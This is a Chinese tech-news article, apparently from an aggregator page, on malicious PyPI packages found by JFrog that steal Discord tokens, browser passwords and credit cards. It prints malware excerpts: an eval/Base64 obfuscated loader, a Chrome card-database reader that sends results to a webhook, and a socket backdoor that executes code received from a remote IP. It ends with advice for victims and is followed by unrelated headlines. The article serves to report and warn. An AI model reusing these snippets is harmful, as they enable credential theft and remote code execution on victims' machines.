范文健康探索娱乐情感热点
投稿投诉
热点动态
科技财经
情感日志
励志美文
娱乐时尚
游戏搞笑
探索旅游
历史星座
健康养生
美丽育儿
范文作文
教案论文
国学影视

Python程序员小心,PyPI软件库又双叒叕发现恶意软件,能盗取信用卡还有后门程序

  Python 程序员真的要小心了,PyPI 软件库问题真是越来越严重。
  继今年 6 月出现挖矿病毒后,PyPI 最近再次出现了一批恶意软件,
  JFrog 安全团队发现,PyPI 库中有多个软件存在盗取信用卡信息、远程注入代码的行为,而这些软件总共被下载了 3 万次。
  这些被发现问题的恶意软件分别是:
  当程序员安装完这些软件后,它们将在后台不知不觉读取浏览器文件夹,从而盗取信用卡信息和密码。它们是如何窃取信用卡信息的
  安全研究人员发现,上述所有软件包都使用 Base64 编码进行伪装。
  比如上述的 noblesse2:
  importbase64,codecs
  magic="aW1wb3J0IGNvbG9yYW1hLCBkYXRldGltZS..."
  love="0iLKOcY3L4Y2q1nJkxpl97nJE9Y2EyoTI0M..."
  god="a2luZy5hcHBlbmQodG9rZW4pDQogICAgICAg..."
  destiny="yxIKAVDaAQK3xjpQWkqRAboUcBIzqjEmS..."
  joy="\x72\x6f\x74\x31\x33"
  trust=eval("\x6d\x61\x67\x69\x63")+eval("\x63\x6f\x64\x65\x63\x73\x2e\x64...")
  eval(compile(base64.b64decode(eval("\x74\x72\x75\x73\x74")),"","exec"))
  这种方法可以欺骗一些简单的分析工具,但是仔细研究可以发现其中的问题。
  以上 8 个软件包分别包含了以下不同种类的恶意行为:
  1、窃取 Discord 帐户身份验证 token
  Discord 身份验证 token 读取器的代码非常简单,它就是一组硬编码的路径:
  local=os.getenv("LOCALAPPDATA")
  roaming=os.getenv("APPDATA")
  paths={
  "Discord":roaming+"\\Discord",
  "DiscordCanary":roaming+"\\discordcanary",
  "DiscordPTB":roaming+"\\discordptb",
  "GoogleChrome":local+"\\Google\\Chrome\\UserData\\Default",
  "Opera":roaming+"\\OperaSoftware\\OperaStable",
  "Brave":local+"\\BraveSoftware\\Brave-Browser\\UserData\\Default",
  "Yandex":local+"\\Yandex\\YandexBrowser\\UserData\\Default"
  }
  然后代码会读取这几种浏览器路径下的所有.log 和.ldb 文件,并查找 Discord 身份验证 token,结果通过 Webhook 上传到 Discord。
  2、窃取浏览器存储的密码或信用卡数据
  当你在浏览器中输入密码或信用卡数据时,一般都会跳出如下窗口,提示用户保存这些信息。
  虽然这给用户带来方便,今后不用一遍遍输入密码,但缺点是这些信息可能会恶意软件获取。
  在这种情况下,恶意软件会尝试从 Chrome 窃取信用卡信息:
  defcs():
  master_key=master()
  login_db=os.environ["USERPROFILE"]+os.sep+\
  r"AppData\Local\Google\Chrome\UserData\default\WebData"
  shutil.copy2(login_db,
  "CCvault.db")
  conn=sqlite3.connect("CCvault.db")
  cursor=conn.cursor()
  try:
  cursor.execute("SELECT*FROMcredit_cards")
  forrincursor.fetchall():
  username=r[1]
  encrypted_password=r[4]
  decrypted_password=dpw(
  encrypted_password,master_key)
  expire_mon=r[2]
  expire_year=r[3]
  hook.send(f"CARD-NAME:"+username+"\nNUMBER:"+decrypted_password+"\nEXPIRYM:"+str(expire_mon)+"\nEXPIRYY:"+str(expire_year)+"\n"+"*"*10+"\n")
  这些信息和前一种情况一样会通过 Webhook 上传。
  3、收集有关受感染 PC 的信息:如 IP 地址、计算机名称和用户名
  除此之外,这些软件还会收集 Windows 许可证密钥信息、Windows 版本以及屏幕截图。
  4、远程代码注入
  pytagora 和 pytagora2 这两个恶意软件会尝试连接到某个 IP 地址 9009 端口上的,然后执行 Socket 中可用的任何 Python 代码。
  其中混淆的代码被安全人员解码成如下片段:
  importsocket,struct,time
  s=socket.socket(2,socket.socket.socket.SOCK_STREAM)
  s.connect(("172.16.60.80",9009))
  l=struct.unpack(">I",s.recv(4))[0]
  print(l)
  d=s.recv(l)
  print(d)
  whilelen(d)>!1:
  d+=s.recv(l-len(d))
  print(d)
  exec(d,{"s":s})
  但是安全人员现在不知道这个 IP 地址是什么,或者上面是否存在恶意软件。中毒后如何挽救
  如果你发现自己的电脑已经安装了诸如 noblesse 的恶意软件,那么请检查一下你的浏览器到底保存了哪些密码,这些密码可能已经泄露,请尽快修改。
  对于 Edge 浏览器用户,请在地址栏中输入 edge://settings/passwords,查看已保存的密码。
  对于 Chrome 浏览器用户,请在地址栏中输入 chrome://settings/payments,在付款方式一栏下查看已保存的信用卡信息。
  另外可以松口气的是,PyPI 维护人员已经删除了这些恶意软件包。
  虽然 PyPI 软件库现在是安全了,但是鉴于这些开源软件库现在的维护状态,未来很可能还会遇到更多攻击。今年 PyPI 库出现安全问题的状况就不止一次出现。
  "攻击者能够使用简单的混淆技术来引入恶意软件,这意味着开发人员必须保持警惕。"
  JFrog CTO 说,"这是一个系统性威胁,需要由软件存储库的维护者和开发人员在多个层面积极解决。"

一加6T刷入Win10ARM获重大进展成功运行桌面感谢IT之家网友wherewhere的线索投递!IT之家4月3日消息在4月1日愚人节当天展示一些不太可能的东西可能不是好主意,但这正是Windows10onARM研究黑客发布的内容谷歌Chrome浏览器添加DuckDuckGo搜索引擎IT之家3月14日消息谷歌一直面临着欧盟及其他国家对其在多个市场(包括在线搜索)的主导地位的反垄断调查,并且谷歌也因此被罚了不少罚款。或许是因为这个,Chrome浏览器搜索引擎新增微软Win1020H1SDK预览版18894发布IT之家5月15日消息微软此前发布了针对20H1开发周期的第一个Windows10SDK预览版本18890,带来了一些实质性的新变化。现在,微软面向开发者推出了Windows10S微软2019Win10更新五月版18362。113发布预览版推送IT之家5月15日消息今天是周二补丁日,微软面向2019Windows10更新五月版推送了Build18362。113的慢速和发布预览版更新,即Windows101903版本,其中台湾高铁Win10UWP版上架感谢IT之家网友谁动了我的的线索投递!IT之家5月14日消息去年,IT之家报道了台湾高铁WP版下架的消息,但是现在,据网友反馈,台湾高铁Windows10UWP上架了,而且是从原有微软Win1020H1首个SDK预览版发布感谢IT之家网友360尘粒的线索投递!IT之家5月14日消息微软已经在开发Windows1020H1预览版,预计将在明年4月份发布。近期,微软发布了Windows1020H1SDK便签Win10UWP更新插入图片,支持多桌面IT之家5月14日消息微软今天发布了针对所有Windows10用户的StickyNotes应用程序正式版更新,StickyNotesv3。6带来了在笔记中插入照片的功能,并带来了多重大突破刷了Win10ARM的Lumia950XL将支持蜂窝网络连接IT之家4月11日消息微软Lumia950XL上刷Windows10ARM系统在去年取得了巨大进步,但有一个问题一直阻止着,刷了Windows10ARM系统的Lumia950XL手刷了Win10ARM的Lumia950XL已可识别SIM卡感谢IT之家网友wherewhere的线索投递!IT之家4月12日消息微软Lumia950XL上刷Windows10ARM系统在去年取得了巨大进步,昨天IT之家报道,刷了Windo刷了Win10ARM的微软Lumia950XL成功识别移动信号感谢IT之家网友wherewhere的线索投递!IT之家4月17日消息微软Lumia950XL上刷Windows10ARM系统在去年取得了巨大进步,此前IT之家报道,刷了Windo微软即将关闭Windows8。1版MSN应用IT之家5月3日消息两周前曾有报道称,微软正在通过微软商店推进Windows8应用更新的关闭。该操作系统现在提前至2019年7月1日,而不是2023年7月1日之前停止接收应用更新。
微软Win1020H1预览版19018更新内容大全IT之家11月7日消息微软近期推送了最新的Windows1020H1快速预览版更新19018,本次更新针对一些功能带来新的改进。Windows1020H1快速预览版更新19018包微软SurfacePro65代推送Win10固件更新大量修复IT之家4月6日消息微软已经向SurfacePro第五代以及去年的SurfacePro6推送了Windows10系统固件更新。主要是为了提高系统稳定性和可靠性,相比起来,Surfa微软宣布关闭HealthVault健康服务IT之家4月6日消息几年前,谷歌关闭了他们的健康服务,并要求其用户迁移到微软的HealthVault服务。去年,微软决定关闭HealthVaultInsights移动应用程序。上个微软Windows7将开始警告通知2020年停止服务支持IT之家3月21日消息微软计划在2020年1月终止对Windows7的全部支持,现在微软已经开始准备向广大Windows7用户推送这一通知消息。微软最近证实,它将在Windows7微软Win1020H1跳跃预览版18860推送,附更新内容感谢IT之家网友旺仔复原乳的线索投递!IT之家3月21日消息微软今天面向SkipAhead跳跃预览通道推送了最新的Windows1020H1预览版18860系统更新,主要带来了SW微软Win1019H1快速预览版18362推送,附更新内容感谢IT之家网友江苏西门吹雪的线索投递!IT之家3月21日消息今天,微软面向快速预览通道推送了Windows1019H1快速预览版18362系统更新,本次更新没有加入新功能,带来了登上全球第一宝座,微软市值首次突破9020亿美元IT之家3月19日消息在美国时间3月18日周一收盘后,微软股价增长1。43,收盘价为117。57美元,市值达到9020亿美元,这也是微软市值首次超过9000亿美元。作为对比,苹果股AdobePhotoshopElements2019上架Win10微软商店IT之家11月18日消息据WindowsCentral消息,Adobe的PhotoshopElements2019软件现已在Windows10的MicrosoftStore商店上架WPSOffice2019WindowsMac版正式发布免费下载感谢IT之家网友软媒用户1433833的线索投递!IT之家11月21日消息近期,WPS正式发布了WPSOffice2019WPSOffice2019forMacWPS文档等产品,现Win10基准密码每隔60天就要修改?微软已不再强制IT之家4月30日消息在最新的2019Windows10更新五月版系统中,微软正在为组织修改基准安全配置,摆脱60天密码过期的策略。在最新发布的安全基准配置草案中,微软表示,避免密小SSD请注意,Win10五月更新最少需要32GB空间IT之家4月29日消息微软Windows10五月更新即将的到来,目前在发布预览通道已经有用户收到RTM版更新,不过,临近发布,微软也偷偷修改了Windows10五月更新的最低存储空